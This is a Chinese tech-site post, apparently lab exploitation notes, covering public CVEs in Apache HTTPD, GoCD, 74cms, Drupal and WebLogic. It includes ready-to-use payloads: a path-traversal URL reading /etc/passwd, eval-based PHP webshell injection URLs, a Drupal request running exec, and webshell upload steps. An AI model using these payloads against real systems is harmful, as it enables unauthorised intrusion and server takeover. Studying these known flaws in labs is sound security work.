栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

PTB-CVE

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

PTB-CVE

文章目录
    • Apache HTTPD 多后缀解析漏洞
    • Tomcat WebSokcet 拒绝服务
    • GoCD 任意文件读取漏洞
    • 骑士cms任意代码执行
    • drupal 代码执行
    • weblogic 文件上传

Apache HTTPD 多后缀解析漏洞

如果运维人员给.php后缀增加了处理器:
AddHandler application/x-httpd-php .php
那么,在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。

上传一个以jpg为后缀的一句话木马但是包含.php

会被成功解析成php

Tomcat WebSokcet 拒绝服务 GoCD 任意文件读取漏洞

GoCD 任意文件读取漏洞 (CVE-2021-43287) GoCD
一款先进的持续集成和发布管理系统,由ThoughtWorks开发。(不要和Google的编程语言Go混淆了!)其前身为CruiseControl,是ThoughtWorks在做咨询和交付交付项目时自己开发的一款开源的持续集成工具。后来随着持续集成及持续部署的火热,ThoughtWorks专门成立了一个项目组,基于Cruise开发除了Go这款工具。ThoughtWorks开源持续交付工具Go。使用Go来建立起一个项目的持续部署pipeline是非常快的,非常方便。
GoCD的v20.6.0 -
v21.2.0版本存在任意文件读取漏洞,可以通过/go/add-on/business-continuity/api/plugin?folderName=&pluginName=…/…/…/etc/passwd
对文件进行读取。

payload

http://127.0.0.1/go/add-on/business-continuity/api/plugin?folderName=&pluginName=…/…/…/etc/passwd

骑士cms任意代码执行

CVE-2020-35339
漏洞简介 迅易科技 74cms是中国迅易科技公司的一套基于PHP和MySQL的在线招聘系统。

74cms version 5.0.1
存在安全漏洞,该漏洞源于应用管理控制器ConfigController.class.php和ThinkPHP Common
functions.php存在远程代码执行漏洞,攻击者可利用该漏洞可以获得服务器权限并控制服务器。

登录后台 index.php?m=Admin

http://192.168.121.130/.',phpinfo(),'/.com



也可以写入一句话

http://192.168.121.130/.',eval($_POST[mzq]),'/.com

drupal 代码执行

漏洞简介 Drupal是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。

Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞。远程攻击者可利用该漏洞执行任意代码。以下版本受到影响:Drupal
7.58之前版本,8.3.9之前的8.x版本,8.4.6之前的8.4.x版本,8.5.1之前的8.5.x版本。 该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站
环境启动后,访问http://your-ip:8080/,会看到drupal安装页面。使用“标准”配置文件完成 drupal
安装。因为没有mysql环境,所以安装的时候要选择sqlite数据库。安装完成后,您就可以开始利用它了。

抓取注册页面上传图片的页面

修改数据包

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 776-52a2c3bf-ca8f-4a05-b626-ee5fb4786c64.do-not-trust.hacking.run
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=dir

weblogic 文件上传

访问漏洞点
/ws_utc/config.do

修改工作目录

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css




上传jsp一句话


转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/871703.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号